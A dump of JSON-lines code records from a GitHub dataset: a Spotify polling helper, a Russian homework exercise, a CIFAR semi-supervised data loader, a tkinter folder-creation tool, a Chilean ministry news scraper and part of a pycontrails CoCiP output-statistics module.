do_auth:\n try:\n tmp = await refresh(db['refresh_token'])\n except:\n do_auth = True\n\n if do_auth:\n tmp = await auth()\n\n db['refresh_token'] = tmp['refresh_token']\n db['access_token'] = tmp['access_token']\n db['expires_at'] = tmp['expires_in'] + time.time()\n\n return await try_open(db['access_token'], url, data)\n\nasync def poll():\n data = await open('https://api.spotify.com/v1/me/player/currently-playing')\n if data != b'':\n return json.loads(data.decode())\n else:\n return None","repo_name":"DutChen18/lyrics","sub_path":"spotify.py","file_name":"spotify.py","file_ext":"py","file_size_in_byte":3070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"1316941906","text":"'''''\nНаписать функцию для поиска разницы сумм всех четных и всех нечетных чисел среди num_limit \nслучайно сгенерированных чисел в указанном числовом диапазоне. \nТ.е. от суммы четных чисел вычесть сумму нечетных чисел.\n\t\tdef diff_even_odd(num_limit, lower_bound, upper_bound): # returns int\n\t\t pass\n'''''\nimport random\ndef diff_even_odd(num_limit, lower_bound, upper_bound):\n num_limit = random.sample(range(lower_bound, upper_bound), 20)\n even_nums = [i for i in num_limit if i % 2 == 0]\n odd_nums = [i for i in num_limit if i % 2 != 0]\n return num_limit, even_nums, odd_nums, print('Difference between nums is: ', (sum(even_nums) - sum(odd_nums)))\nresult = diff_even_odd([20], 1, 30)\nprint(result)\nprint('The End')","repo_name":"AlexGoAhead/hw","sub_path":"20.py","file_name":"20.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"13487306184","text":"import logging\nimport math\n\nimport numpy as np\nfrom PIL import Image\nfrom torchvision import datasets\nfrom torchvision import transforms\n\nfrom .randaugment import RandAugmentMC\n\nimport torch\nfrom torch import nn\nfrom torchvision.transforms import transforms\n\nlogger = logging.getLogger(__name__)\n\ncifar10_mean = (0.4914, 0.4822, 0.4465)\ncifar10_std = (0.2471, 0.2435, 0.2616)\ncifar100_mean = (0.5071, 0.4867, 0.4408)\ncifar100_std = (0.2675, 0.2565, 0.2761)\nnormal_mean = (0.5, 0.5, 0.5)\nnormal_std = (0.5, 0.5, 0.5)\n\n\n\n\n\ndef get_cifar10(args, root, active_index = None):\n transform_labeled = transforms.Compose([\n transforms.RandomHorizontalFlip(),\n transforms.RandomCrop(size=32,\n padding=int(32*0.125),\n padding_mode='reflect'),\n transforms.ToTensor(),\n transforms.Normalize(mean=cifar10_mean, std=cifar10_std)\n ])\n transform_val = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean=cifar10_mean, std=cifar10_std)\n ])\n base_dataset = datasets.CIFAR10(root, train=True, download=True)\n\n train_labeled_idxs, train_unlabeled_idxs, labeled_idxs_org = x_u_split(\n args, base_dataset.targets, active_index)\n\n train_labeled_dataset = CIFAR10SSL(\n root, train_labeled_idxs, train=True,\n transform=transform_labeled)\n\n train_unlabeled_dataset = CIFAR10SSL(\n root, train_unlabeled_idxs, train=True,\n transform=TransformFixMatch(mean=cifar10_mean, std=cifar10_std))\n\n train_labeled_sim_dataset = CIFAR10SSL(\n root, train_labeled_idxs, train=True,\n transform=ContrastiveLearningViewGenerator(32,args.n_views))\n \n \n train_unlabeled_sim_dataset = CIFAR10SSL(\n root, train_unlabeled_idxs, train=True,\n transform=ContrastiveLearningViewGenerator(32,args.n_views))\n\n\n test_dataset = datasets.CIFAR10(\n root, train=False, transform=transform_val, download=False)\n\n return train_labeled_dataset, train_unlabeled_dataset, test_dataset, labeled_idxs_org, train_unlabeled_sim_dataset, train_labeled_sim_dataset\n\n\ndef get_cifar100(args, root, active_index = None):\n\n transform_labeled = transforms.Compose([\n transforms.RandomHorizontalFlip(),\n transforms.RandomCrop(size=32,\n padding=int(32*0.125),\n padding_mode='reflect'),\n transforms.ToTensor(),\n transforms.Normalize(mean=cifar100_mean, std=cifar100_std)])\n\n transform_val = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean=cifar100_mean, std=cifar100_std)])\n\n base_dataset = datasets.CIFAR100(\n root, train=True, download=True)\n\n train_labeled_idxs, train_unlabeled_idxs, labeled_idxs_org = x_u_split(\n args, base_dataset.targets, active_index)\n\n train_labeled_dataset = CIFAR100SSL(\n root, train_labeled_idxs, train=True,\n transform=transform_labeled)\n\n train_unlabeled_dataset = CIFAR100SSL(\n root, train_unlabeled_idxs, train=True,\n transform=TransformFixMatch(mean=cifar100_mean, std=cifar100_std))\n\n train_labeled_sim_dataset = CIFAR100SSL(\n root, train_labeled_idxs, train=True,\n transform=ContrastiveLearningViewGenerator(32,args.n_views))\n \n \n train_unlabeled_sim_dataset = CIFAR100SSL(\n root, train_unlabeled_idxs, train=True,\n transform=ContrastiveLearningViewGenerator(32,args.n_views)) \n \n\n test_dataset = datasets.CIFAR100(\n root, train=False, transform=transform_val, download=False)\n\n return train_labeled_dataset, train_unlabeled_dataset, test_dataset, labeled_idxs_org, train_unlabeled_sim_dataset, train_labeled_sim_dataset\n\n\ndef x_u_split(args, labels, act_index = None):\n if act_index is None:\n labels = np.array(labels)\n labeled_idx = []\n # unlabeled data: all data (https://github.com/kekmodel/FixMatch-pytorch/issues/10)\n unlabeled_idx = np.array(range(len(labels)))\n \n idx = np.arange(len(labels))\n idx = np.random.choice(idx, args.num_labeled, False)\n labeled_idx.extend(idx)\n\n labeled_idx = np.array(labeled_idx)\n assert len(labeled_idx) == args.num_labeled\n labeled_idx_org = labeled_idx\n labeled_num = args.num_labeled\n if args.expand_labels or args.num_labeled < args.batch_size:\n num_expand_x = math.ceil(\n args.batch_size * args.eval_step / labeled_num) \n labeled_idx = np.hstack([labeled_idx for _ in range(num_expand_x)])\n \n else:\n labeled_idx = act_index\n unlabeled_idx = np.array(range(len(labels)))\n labeled_idx_org = labeled_idx\n labeled_num = act_index.shape[0]\n\n if args.expand_labels or args.num_labeled < args.batch_size:\n num_expand_x = math.ceil(\n args.batch_size * args.num_sample / labeled_num) \n \n if act_index is not None and act_index.shape[0] == args.stop_active:\n num_expand_x = math.ceil(\n args.batch_size * args.eval_step / args.stop_active)\n\n labeled_idx = np.hstack([labeled_idx for _ in range(num_expand_x)])\n np.random.shuffle(labeled_idx)\n\n return labeled_idx, unlabeled_idx, labeled_idx_org\n\n\nclass TransformFixMatch(object):\n def __init__(self, mean, std):\n self.weak = transforms.Compose([\n transforms.RandomHorizontalFlip(),\n transforms.RandomCrop(size=32,\n padding=int(32*0.125),\n padding_mode='reflect')])\n self.strong = transforms.Compose([\n transforms.RandomHorizontalFlip(),\n transforms.RandomCrop(size=32,\n padding=int(32*0.125),\n padding_mode='reflect'),\n RandAugmentMC(n=2, m=10)])\n self.normalize = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean=mean, std=std)])\n\n def __call__(self, x):\n weak = self.weak(x)\n strong = self.strong(x)\n return self.normalize(weak), self.normalize(strong)\n \n\n#def get_simclr_pipeline_transform(size, s=1):\n# \"\"\"Return a set of data augmentation transformations as described in the SimCLR paper.\"\"\"\n# color_jitter = transforms.ColorJitter(0.8 * s, 0.8 * s, 0.8 * s, 0.2 * s)\n# data_transforms = transforms.Compose([transforms.RandomResizedCrop(size=size),\n# transforms.RandomHorizontalFlip(),\n# transforms.RandomApply([color_jitter], p=0.8),\n# transforms.RandomGrayscale(p=0.2),\n# GaussianBlur(kernel_size=int(0.1 * size)),\n# transforms.ToTensor()])\n \nclass ContrastiveLearningViewGenerator(object):\n \"\"\"Take two random crops of one image as the query and key.\"\"\"\n\n def __init__(self, size, n_views=2):\n self.color_jitter = transforms.ColorJitter(0.8 * 1, 0.8 * 1, 0.8 * 1, 0.2 * 1) #s = 1; size = 32\n self.base_transform = transforms.Compose([transforms.RandomResizedCrop(size=size),\n transforms.RandomHorizontalFlip(),\n transforms.RandomApply([self.color_jitter], p=0.8),\n transforms.RandomGrayscale(p=0.2),\n GaussianBlur(kernel_size=int(0.1 * size)),\n transforms.ToTensor()])\n self.n_views = n_views\n\n def __call__(self, x):\n #return [self.base_transform(x) for i in range(self.n_views)]\n return self.base_transform(x), self.base_transform(x)\n\n\nclass CIFAR10SSL(datasets.CIFAR10):\n def __init__(self, root, indexs, train=True,\n transform=None, target_transform=None,\n download=False):\n super().__init__(root, train=train,\n transform=transform,\n target_transform=target_transform,\n download=download)\n if indexs is not None:\n self.data = self.data[indexs]\n self.targets = np.array(self.targets)[indexs]\n\n def __getitem__(self, index):\n img, target = self.data[index], self.targets[index]\n img = Image.fromarray(img)\n\n if self.transform is not None:\n img = self.transform(img)\n\n if self.target_transform is not None:\n target = self.target_transform(target)\n\n return img, target, index\n\n\nclass CIFAR100SSL(datasets.CIFAR100):\n def __init__(self, root, indexs, train=True,\n transform=None, target_transform=None,\n download=False):\n super().__init__(root, train=train,\n transform=transform,\n target_transform=target_transform,\n download=download)\n if indexs is not None:\n self.data = self.data[indexs]\n self.targets = np.array(self.targets)[indexs]\n\n def __getitem__(self, index):\n img, target = self.data[index], self.targets[index]\n img = Image.fromarray(img)\n\n if self.transform is not None:\n img = self.transform(img)\n\n if self.target_transform is not None:\n target = self.target_transform(target)\n\n return img, target, index\n\n\nclass GaussianBlur(object):\n \"\"\"blur a single image on CPU\"\"\"\n def __init__(self, kernel_size):\n radias = kernel_size // 2\n kernel_size = radias * 2 + 1\n self.blur_h = nn.Conv2d(3, 3, kernel_size=(kernel_size, 1),\n stride=1, padding=0, bias=False, groups=3)\n self.blur_v = nn.Conv2d(3, 3, kernel_size=(1, kernel_size),\n stride=1, padding=0, bias=False, groups=3)\n self.k = kernel_size\n self.r = radias\n\n self.blur = nn.Sequential(\n nn.ReflectionPad2d(radias),\n self.blur_h,\n self.blur_v\n )\n\n self.pil_to_tensor = transforms.ToTensor()\n self.tensor_to_pil = transforms.ToPILImage()\n\n def __call__(self, img):\n img = self.pil_to_tensor(img).unsqueeze(0)\n\n sigma = np.random.uniform(0.1, 2.0)\n x = np.arange(-self.r, self.r + 1)\n x = np.exp(-np.power(x, 2) / (2 * sigma * sigma))\n x = x / x.sum()\n x = torch.from_numpy(x).view(1, -1).repeat(3, 1)\n\n self.blur_h.weight.data.copy_(x.view(3, 1, self.k, 1))\n self.blur_v.weight.data.copy_(x.view(3, 1, 1, self.k))\n\n with torch.no_grad():\n img = self.blur(img)\n img = img.squeeze()\n\n img = self.tensor_to_pil(img)\n\n return img\n\n\n\nDATASET_GETTERS = {'cifar10': get_cifar10,\n 'cifar100': get_cifar100}\n","repo_name":"Genj1Kai/ActiveMatch","sub_path":"dataset/cifar.py","file_name":"cifar.py","file_ext":"py","file_size_in_byte":11013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"15620424994","text":"import shutil\nfrom tkinter import *\nimport os\n\nshablons = {\n 'Семейства': ['00_ID', '01_КП', '02_Договор', '03_ТЗ', '04_Рабочая', '05_Экспорт'],\n 'Моделирование': ['00_ID', '01_КП']\n\n}\n\n# files = {\n# 'Семейства': [['00_ID', 'test11.txt'], ['00_ID', 'test21.txt'],\n# ['01_КП', 'test31.txt'], ['01_КП', 'test41.txt']\n# ],\n# 'Моделирование': [['00_ID', 'test12.txt'], ['00_ID', 'test22.txt'],\n# ['01_КП', 'test32.txt'], ['01_КП', 'test42.txt']\n# ],\n#\n#\n#\n# }\n\ndef copy(directory, new_directory):\n # нормализованный путь к файлам\n directory = os.path.abspath(directory)\n\n # файлы в папке\n object_in_folder = os.listdir(directory)\n\n # перебираем объекты и проверяем: файл или папка\n for object in object_in_folder:\n way = directory + '\\\\' + object\n\n # если путь ведет к файлу:\n if os.path.isfile(way) == True:\n file = object\n try:\n new_directory = path + '\\\\' + '\\\\'.join(way.split('\\\\')[-2:])\n shutil.copyfile(way, new_directory)\n except:\n pass\n\n # #есть ли файл в списке\n # for i in allNames:\n # if i[1] == file:\n # print(file)\n # name_new = i[0]\n # try:\n # os.rename(directory + '\\\\' + file, directory + '\\\\' + name_new)\n # break\n # except FileExistsError:\n # break\n #если путь ведет к папке\n else:\n copy(way, new_directory)\n\n\n\n\n\nsource_ways = r\"\\\\dc\\Bim\\08_Общая\\00_BIM_JUNIOR\\03_Рабочая\\Roma\\createfolder\"\n\nprint(os.listdir(source_ways))\n\n\n\n\nroot = Tk()\nroot.title(\"Графическая программа на Python\")\nroot.geometry(\"350x300\")\n\n\nentry = Entry(width=20) # текстовое поле ввода\ncreate = Button(text=\"Создать\", command=root.destroy) # кнопка создать\nvariable = StringVar(root) # выскакивающее меню\nvariable.set(list(shablons.keys())[0]) # default value\ncvar1 = BooleanVar() # флажок\ncvar1.set(0)\nflag = Checkbutton(text=\"Копировать шаблоны\", variable=cvar1, onvalue=1, offvalue=0)\n\n\nw = OptionMenu(root, variable, *list(shablons.keys()))\nprint(w)\n\ndef entrydirectory(event):\n directory = entry.get()\n global path\n path = directory\n\n\n # return directory\n\n\n\n\ncreate.bind('', entrydirectory)\n# path = entryDirectory\n\n\n\nprint(cvar1.get())\n\n\n# entry.place()\n\n# w.place(relx=0.5, rely=0.5)\n# flag.place(relx=0.5, rely=0.65) #anchor=W\n# create.place(relx=0.7, rely=0.8)\n\n\nLabel(text='Путь:').grid(row=1, column=0, sticky=W, padx=10, pady=10)\nLabel(text='Тип работ:').grid(row=2, column=0, sticky=W, padx=10, pady=10)\nentry.grid(row=1, column=1, sticky=W+E, padx=10, pady=10)\nw.grid(row=2, column=1, padx=10, sticky=W+E, pady=10) # выскакивающее меню\nflag.grid(row=3, column=1, padx=10, pady=10) #anchor=W\n\ncreate.grid(row=4, column=2, padx=10, pady=50)\n\n# create.pack()\nroot.mainloop()\n\n\n\n# print(list(files.keys()))\n\n\n\n\n\n\n\ntag = variable.get() # забираем из выпадающего меню тег\n# path = r'C:\\Users\\r.enikeev\\Desktop\\Новая папка'\n\n\n\n# tag = 'Моделирование'\n\n\n\ntry:\n for folder in shablons[tag]:\n directory_of_folder = path + '\\\\' + folder\n os.mkdir(directory_of_folder)\nexcept OSError:\n print(\"Creation of the directory %s failed\" % path)\nelse:\n print(\"Successfully created the directory %s \" % path)\n\n\nprint(directory_of_folder)\nprint(cvar1.get())\nif cvar1.get():\n copy(source_ways, path)\n\n\n","repo_name":"RomanEnikeev/01.Scripts","sub_path":"01.Scripts/09.CreateFolder/array.py","file_name":"array.py","file_ext":"py","file_size_in_byte":4084,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"8943196700","text":"from urllib.request import urlopen #IMPORTAR URL ABIERTA\r\nfrom bs4 import BeautifulSoup\r\nimport time\r\nimport logging \r\n\r\nlogging.basicConfig(filename='minagri.log',\r\n filemode='a',format='%(asctime)s : %(levelname)s : %(message)s',\r\n datefmt='%d/%m/%y %H:%M:%S',\r\n level=logging.INFO)\r\nlogging.info('Scraper minagri')\r\nstart = time.process_time()\r\n\r\nurl_scraper = \"https://www.minagri.gob.cl/prensa/noticias/\"\r\nrequest_pagina = urlopen(url_scraper) #VAMOS A SOLICITAR LA PÁGINA\r\npagina_html = request_pagina.read() #SE LEE LA RESPUESTA\r\nrequest_pagina.close()\r\nhtml_soup = BeautifulSoup(pagina_html, 'html.parser')# PÁGINA Y ANALIZADOR HTML\r\ncontenido_pagina = html_soup.find_all('article', class_=\"caluga-noticia\")\r\nhipervinculo_titulo = html_soup.find_all('div', class_=\"box-cuerpo-noticia-calugas\")\r\n\r\nfilename = 'minagri.csv'\r\nf = open(filename, 'w', encoding='utf-8')\r\nheaders = 'imagen, titulo, descripcion, temas, HIBERVINCUL\\n'\r\nf.write(headers)\r\n\r\nfor cont in hipervinculo_titulo:\r\n hipervinculo = cont.find('a').get('href')\r\nfor contenido in contenido_pagina:\r\n imagen = contenido.find('img', class_=\"img-responsive\").get('src')\r\n titulo = contenido.find('h5', class_=\"titulo-noticia\").text\r\n categoria = contenido.find('a', rel = \"category tag\").text\r\n descripcion = contenido.find('p', class_= \"box-cuerpo-noticia\").text\r\n logging.info('Titulo de la noticia: '+str(titulo))\r\n f.write(titulo+\",\"+descripcion+\",\"+categoria+\",\"+str(imagen)+\",\"+str(hipervinculo))\r\n\r\nlogging.warning('Cada titulo y fecha esta individualizado por cda noticia')\r\nend = time.process_time()\r\nlogging.info('Tiempo total de ejecucion: '+str(end - start))\r\nf.close() ","repo_name":"KarlaInostrozaUrbina/scrapers","sub_path":"scraper huertos/minagri-Daniel_Aguilera.py","file_name":"minagri-Daniel_Aguilera.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"34415923053","text":"\"\"\"CoCiP output formats.\n\nThis module includes functions to produce additional output formats, including the:\n (1) Flight waypoint outputs.\n See :func:`flight_waypoint_summary_statistics`.\n (2) Contrail flight summary outputs.\n See :func:`contrail_flight_summary_statistics`.\n (3) Gridded outputs.\n See :func:`longitude_latitude_grid`.\n (4) Time-slice statistics.\n See :func:`time_slice_statistics`.\n (5) Aggregate contrail segment optical depth/RF to a high-resolution longitude-latitude grid.\n See :func:`contrails_to_hi_res_grid`.\n (6) Increase spatial resolution of natural cirrus properties, required to estimate the\n high-resolution contrail cirrus coverage for (5).\n See :func:`natural_cirrus_properties_to_hi_res_grid`.\n\"\"\"\nfrom __future__ import annotations\n\nimport warnings\nfrom typing import Hashable\n\nimport numpy as np\nimport numpy.typing as npt\nimport pandas as pd\nimport xarray as xr\n\nfrom pycontrails.core.met import MetDataArray, MetDataset\nfrom pycontrails.core.vector import GeoVectorDataset, vector_to_lon_lat_grid\nfrom pycontrails.models.cocip.contrail_properties import contrail_edges, plume_mass_per_distance\nfrom pycontrails.models.cocip.radiative_forcing import albedo\nfrom pycontrails.models.humidity_scaling import HumidityScaling\nfrom pycontrails.models.tau_cirrus import tau_cirrus\nfrom pycontrails.physics import geo, units\nfrom pycontrails.physics.thermo import rho_d\n\n# -----------------------\n# Flight waypoint outputs\n# -----------------------\n\n\ndef flight_waypoint_summary_statistics(\n flight_waypoints: GeoVectorDataset | pd.DataFrame,\n contrails: GeoVectorDataset | pd.DataFrame,\n) -> GeoVectorDataset:\n \"\"\"\n Calculate the contrail summary statistics at each flight waypoint.\n\n Parameters\n ----------\n flight_waypoints : GeoVectorDataset | pd.DataFrame\n Flight waypoints that were used in :meth:`Cocip.eval` to produce ``contrails``.\n contrails : GeoVectorDataset | pd.DataFrame\n Contrail evolution outputs from CoCiP, :attr:`Cocip.contrail`\n\n Returns\n -------\n GeoVectorDataset\n Contrail summary statistics attached to each flight waypoint.\n\n Notes\n -----\n Outputs and units:\n - ``mean_contrail_altitude``, [:math:`m`]\n - ``mean_rhi``, [dimensionless]\n - ``mean_n_ice_per_m``, [:math:`m^{-1}`]\n - ``mean_r_ice_vol``, [:math:`m`]\n - ``mean_width``, [:math:`m`]\n - ``mean_depth``, [:math:`m`]\n - ``mean_tau_contrail``, [dimensionless]\n - ``mean_tau_cirrus``, [dimensionless]\n - ``max_age``, [:math:`h`]\n - ``mean_rf_sw``, [:math:`W m^{-2}`]\n - ``mean_rf_lw``, [:math:`W m^{-2}`]\n - ``mean_rf_net``, [:math:`W m^{-2}`]\n - ``ef``, [:math:`J`]\n - ``mean_olr``, [:math:`W m^{-2}`]\n - ``mean_sdr``, [:math:`W m^{-2}`]\n - ``mean_rsr``, [:math:`W m^{-2}`]\n \"\"\"\n # Aggregation map\n agg_map = {\n # Location, ambient meteorology and properties\n \"altitude\": \"mean\",\n \"rhi\": [\"mean\", \"std\"],\n \"n_ice_per_m\": [\"mean\", \"std\"],\n \"r_ice_vol\": \"mean\",\n \"width\": \"mean\",\n \"depth\": \"mean\",\n \"tau_contrail\": \"mean\",\n \"tau_cirrus\": \"mean\",\n \"age\": \"max\",\n # Radiative properties\n \"rf_sw\": \"mean\",\n \"rf_lw\": \"mean\",\n \"rf_net\": \"mean\",\n \"olr\": \"mean\",\n \"sdr\": \"mean\",\n \"rsr\": \"mean\",\n }\n if \"ef\" not in flight_waypoints:\n agg_map[\"ef\"] = \"sum\"\n\n # Check and pre-process `flights`\n if isinstance(flight_waypoints, GeoVectorDataset):\n flight_waypoints.ensure_vars([\"flight_id\", \"waypoint\"])\n flight_waypoints = flight_waypoints.dataframe\n\n flight_waypoints.set_index([\"flight_id\", \"waypoint\"], inplace=True)\n\n # Check and pre-process `contrails`\n if isinstance(contrails, GeoVectorDataset):\n contrail_vars = [\"flight_id\", \"waypoint\", \"formation_time\", *agg_map]\n contrail_vars.remove(\"age\")\n contrails.ensure_vars(contrail_vars)\n contrails = contrails.dataframe\n\n contrails[\"age\"] = (contrails[\"time\"] - contrails[\"formation_time\"]) / np.timedelta64(1, \"h\")\n\n # Calculate contrail statistics at each flight waypoint\n contrails = contrails.groupby([\"flight_id\", \"waypoint\"]).agg(agg_map)\n contrails.columns = (\n contrails.columns.get_level_values(1) + \"_\" + contrails.columns.get_level_values(0)\n )\n rename_cols = {\"mean_altitude\": \"mean_contrail_altitude\", \"sum_ef\": \"ef\"}\n contrails.rename(columns=rename_cols, inplace=True)\n\n # Concatenate to flight-waypoint outputs\n out = flight_waypoints.join(contrails, how=\"left\")\n out.reset_index(inplace=True)\n return GeoVectorDataset(out)\n\n\n# -------------------------------\n# Contrail flight summary outputs\n# -------------------------------\n\n\ndef contrail_flight_summary_statistics(flight_waypoints: GeoVectorDataset) -> pd.DataFrame:\n \"\"\"\n Calculate contrail summary statistics for each flight.\n\n Parameters\n ----------\n flight_waypoints : GeoVectorDataset\n Flight waypoint outputs with contrail summary statistics attached.\n See :func:`flight_waypoint_summary_statistics`.\n\n Returns\n -------\n pd.DataFrame\n Contrail summary statistics for each flight\n\n Notes\n -----\n Outputs and units:\n - ``total_flight_distance_flown``, [:math:`m`]\n - ``total_contrails_formed``, [:math:`m`]\n - ``total_persistent_contrails_formed``, [:math:`m`]\n - ``mean_lifetime_contrail_altitude``, [:math:`m`]\n - ``mean_lifetime_rhi``, [dimensionless]\n - ``mean_lifetime_n_ice_per_m``, [:math:`m^{-1}`]\n - ``mean_lifetime_r_ice_vol``, [:math:`m`]\n - ``mean_lifetime_contrail_width``, [:math:`m`]\n - ``mean_lifetime_contrail_depth``, [:math:`m`]\n - ``mean_lifetime_tau_contrail``, [dimensionless]\n - ``mean_lifetime_tau_cirrus``, [dimensionless]\n - ``mean_contrail_lifetime``, [:math:`h`]\n - ``max_contrail_lifetime``, [:math:`h`]\n - ``mean_lifetime_rf_sw``, [:math:`W m^{-2}`]\n - ``mean_lifetime_rf_lw``, [:math:`W m^{-2}`]\n - ``mean_lifetime_rf_net``, [:math:`W m^{-2}`]\n - ``total_energy_forcing``, [:math:`J`]\n - ``mean_lifetime_olr``, [:math:`W m^{-2}`]\n - ``mean_lifetime_sdr``, [:math:`W m^{-2}`]\n - ``mean_lifetime_rsr``, [:math:`W m^{-2}`]\n \"\"\"\n # Aggregation map\n agg_map = {\n # Contrail properties and ambient meteorology\n \"segment_length\": \"sum\",\n \"contrail_length\": \"sum\",\n \"persistent_contrail_length\": \"sum\",\n \"mean_contrail_altitude\": \"mean\",\n \"mean_rhi\": \"mean\",\n \"mean_n_ice_per_m\": \"mean\",\n \"mean_r_ice_vol\": \"mean\",\n \"mean_width\": \"mean\",\n \"mean_depth\": \"mean\",\n \"mean_tau_contrail\": \"mean\",\n \"mean_tau_cirrus\": \"mean\",\n \"max_age\": [\"mean\", \"max\"],\n # Radiative properties\n \"mean_rf_sw\": \"mean\",\n \"mean_rf_lw\": \"mean\",\n \"mean_rf_net\": \"mean\",\n \"ef\": \"sum\",\n \"mean_olr\": \"mean\",\n \"mean_sdr\": \"mean\",\n \"mean_rsr\": \"mean\",\n }\n\n # Check and pre-process `flight_waypoints`\n vars_required = [\"flight_id\", \"sac\", *agg_map]\n vars_required.remove(\"contrail_length\")\n vars_required.remove(\"persistent_contrail_length\")\n flight_waypoints.ensure_vars(vars_required)\n\n flight_waypoints[\"contrail_length\"] = np.where(\n flight_waypoints[\"sac\"] == 1.0, flight_waypoints[\"segment_length\"], 0.0\n )\n\n flight_waypoints[\"persistent_contrail_length\"] = np.where(\n np.isnan(flight_waypoints[\"ef\"]), 0.0, flight_waypoints[\"segment_length\"]\n )\n\n # Calculate contrail statistics for each flight\n flight_summary = flight_waypoints.dataframe.groupby([\"flight_id\"]).agg(agg_map)\n flight_summary.columns = (\n flight_summary.columns.get_level_values(1)\n + \"_\"\n + flight_summary.columns.get_level_values(0)\n )\n\n rename_flight_summary_cols = {\n \"sum_segment_length\": \"total_flight_distance_flown\",\n \"sum_contrail_length\": \"total_contrails_formed\",\n \"sum_persistent_contrail_length\": \"total_persistent_contrails_formed\",\n \"mean_mean_contrail_altitude\": \"mean_lifetime_contrail_altitude\",\n \"mean_mean_rhi\": \"mean_lifetime_rhi\",\n \"mean_mean_n_ice_per_m\": \"mean_lifetime_n_ice_per_m\",\n \"mean_mean_r_ice_vol\": \"mean_lifetime_r_ice_vol\",\n \"mean_mean_width\": \"mean_lifetime_contrail_width\",\n \"mean_mean_depth\": \"mean_lifetime_contrail_depth\",\n \"mean_mean_tau_contrail\": \"mean_lifetime_tau_contrail\",\n \"mean_mean_tau_cirrus\": \"mean_lifetime_tau_cirrus\",\n \"mean_max_age\": \"mean_contrail_lifetime\",\n \"max_max_age\": \"max_contrail_lifetime\",\n \"mean_mean_rf_sw\": \"mean_lifetime_rf_sw\",\n \"mean_mean_rf_lw\": \"mean_lifetime_rf_lw\",\n \"mean_mean_rf_net\": \"mean_lifetime_rf_net\",\n \"sum_ef\": \"total_energy_forcing\",\n \"mean_mean_olr\": \"mean_lifetime_olr\",\n \"mean_mean_sdr\": \"mean_lifetime_sdr\",\n \"mean_mean_rsr\": \"mean_lifetime_rsr\",\n }\n\n flight_summary.rename(columns=rename_flight_summary_cols, inplace=True)\n return flight_summary.reset_index([\"flight_id\"])\n\n\n# ---------------\n# Gridded outputs\n# ---------------\n\n\ndef longitude_latitude_grid(\n t_start: np.datetime64 | pd.Timestamp,\n t_end: np.datetime64 | pd.Timestamp,\n flight_waypoints: GeoVectorDataset,\n contrails: GeoVectorDataset,\n *,\n met: MetDataset,\n spatial_bbox: tuple[float, float, float, float] = (-180.0, -90.0, 180.0, 90.0),\n spatial_grid_res: float = 0.5,\n) -> xr.Dataset:\n r\"\"\"\n Aggregate air traffic and contrail outputs to a longitude-latitude grid.\n\n Parameters\n ----------\n t_start : np.datetime64 | pd.Timestamp\n UTC time at beginning of time step.\n t_end : np.datetime64 | pd.Timestamp\n UTC time at end of time step.\n flight_waypoints : GeoVectorDataset\n Flight waypoint outputs with contrail summary statistics attached.\n See :func:`flight_waypoint_summary_statistics`.\n contrails : GeoVectorDataset\n Contrail evolution outputs from CoCiP, :attr:`Cocip.contrail`.\n met : MetDataset\n Pressure level dataset containing 'air_temperature', 'specific_humidity',\n 'specific_cloud_ice_water_content', and 'geopotential'.\n spatial_bbox : tuple[float, float, float, float]\n Spatial bounding box, ``(lon_min, lat_min, lon_max, lat_max)``, [:math:`\\deg`]\n spatial_grid_res : float\n Spatial grid resolution, [:math:`\\deg`]\n\n Returns\n -------\n xr.Dataset\n Air traffic and contrail outputs at a longitude-latitude grid.\n \"\"\"\n # Ensure the required columns are included in `flight_waypoints`, `contrails` and `met`\n flight_waypoints.ensure_vars((\"segment_length\", \"ef\"))\n contrails.ensure_vars(\n (\n \"formation_time\",\n \"segment_length\",\n \"width\",\n \"tau_contrail\",\n \"rf_sw\",\n \"rf_lw\",\n \"rf_net\",\n \"ef\",\n )\n )\n met.ensure_vars(\n (\"air_temperature\", \"specific_humidity\", \"specific_cloud_ice_water_content\", \"geopotential\")\n )\n\n # Downselect `met` to specified spatial bounding box\n met = met.downselect(spatial_bbox)\n\n # Ensure that `flight_waypoints` and `contrails` are within `t_start` and `t_end`\n is_in_time = flight_waypoints.dataframe[\"time\"].between(t_start, t_end, inclusive=\"right\")\n if not np.all(is_in_time):\n warnings.warn(\n \"Flight waypoints have times that are outside the range of `t_start` and `t_end`. \"\n \"Waypoints outside the defined time bounds are removed. \"\n )\n flight_waypoints = flight_waypoints.filter(is_in_time)\n\n is_in_time = contrails.dataframe[\"time\"].between(t_start, t_end, inclusive=\"right\")\n\n if not np.all(is_in_time):\n warnings.warn(\n \"Contrail waypoints have times that are outside the range of `t_start` and `t_end`.\"\n \"Waypoints outside the defined time bounds are removed. \"\n )\n contrails = contrails.filter(is_in_time)\n\n # Calculate additional variables\n t_slices = np.unique(contrails[\"time\"])\n dt_integration_sec = (t_slices[1] - t_slices[0]) / np.timedelta64(1, \"s\")\n\n da_area = geo.grid_surface_area(met[\"longitude\"].values, met[\"latitude\"].values)\n\n flight_waypoints[\"persistent_contrails\"] = np.where(\n np.isnan(flight_waypoints[\"ef\"]), 0.0, flight_waypoints[\"segment_length\"]\n )\n\n # ----------------\n # Grid aggregation\n # ----------------\n # (1) Waypoint properties between `t_start` and `t_end`\n is_between_time = flight_waypoints.dataframe[\"time\"].between(t_start, t_end, inclusive=\"right\")\n ds_wypts_t = vector_to_lon_lat_grid(\n flight_waypoints.filter(is_between_time, copy=True),\n agg={\"segment_length\": \"sum\", \"persistent_contrails\": \"sum\", \"ef\": \"sum\"},\n spatial_bbox=spatial_bbox,\n spatial_grid_res=spatial_grid_res,\n )\n\n # (2) Contrail properties at `t_end`\n contrails_t_end = contrails.filter(contrails[\"time\"] == t_end)\n\n contrails_t_end[\"tau_contrail_area\"] = (\n contrails_t_end[\"tau_contrail\"]\n * contrails_t_end[\"segment_length\"]\n * contrails_t_end[\"width\"]\n )\n\n contrails_t_end[\"age\"] = (\n contrails_t_end[\"time\"] - contrails_t_end[\"formation_time\"]\n ) / np.timedelta64(1, 